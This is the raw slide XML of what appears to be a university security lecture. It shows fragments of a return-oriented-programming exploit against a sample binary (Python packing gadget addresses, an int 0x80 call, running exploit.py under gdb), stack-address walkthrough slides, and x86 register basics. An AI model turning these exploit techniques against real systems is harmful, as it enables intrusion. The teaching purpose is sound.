            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># NOTE: we could remove the next line if we are 100% sure that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is zero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x80541b0) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</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p +=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ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p += pack('&lt;I', 0x80493e1) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a: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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>print p,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>185</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56345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
                                            <p:txEl>
                                              <p:pRg st="25" end="25"/>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
                                            <p:txEl>
                                              <p:pRg st="26" end="26"/>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
                                            <p:txEl>
                                              <p:pRg st="28" end="2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b *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e67</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="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mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>exploit.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas"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186</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173367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187</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9832" y="64602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4961457" y="3844056"/>
          <a:ext cx="3696160" cy="276150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0xbffff5ec</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>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9450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0x08048e67</a:t>
                      </a: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766339" y="7806"/>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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048e44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e47</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e5c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048e66</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697515" y="36882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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83689694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188</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6116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0xbffff5f0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0x0806e91a</a:t>
                      </a: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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185646637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189</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5742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0xbffff5f4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0x0806e91b</a:t>
                      </a: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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="840490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8" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>x86 Registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003529" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two registers are used for high-speed memory transfer operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>si</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (source), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/di (destination)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are several 32-bit special purpose registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: the stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: the frame pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003531" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="302895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2" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3028950"/>
            <a:ext cx="9906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ah</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003533" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="3028950"/>
            <a:ext cx="9144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al</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003534" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477001" y="2272784"/>
            <a:ext cx="505267"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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003535" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="3644384"/>
            <a:ext cx="40267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a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003536" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7600950" y="295513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7" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6667500" y="99060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8" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="480060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9" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4800600"/>
            <a:ext cx="1905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41" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6461125" y="4044434"/>
            <a:ext cx="441146"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esi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003542" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7451725" y="5416034"/>
            <a:ext cx="33855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si</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003543" name="AutoShape 23"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7524750" y="472678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44" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6591300" y="276225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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150808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2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190</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="53885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0xbffff5f8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22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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213188731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191</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="502476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0xbffff5fc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012903043"/>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192</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="465113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0xbffff600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361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5155251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193</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="465113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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff600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114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9110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194</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="42826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0xbffff604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5887309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195</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="39287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0xbffff608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7472813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196</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="354524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0xbffff60c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0218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5396591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197</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="31814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198773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198</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="28176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361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8970899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199</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="28176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2129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9365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Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications provide services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Locally (word processing, file management)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remotely (network services)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The behavior of an application is determined by the code being executed, the data being processed, and the environment in which the application is run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application attacks attempt to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
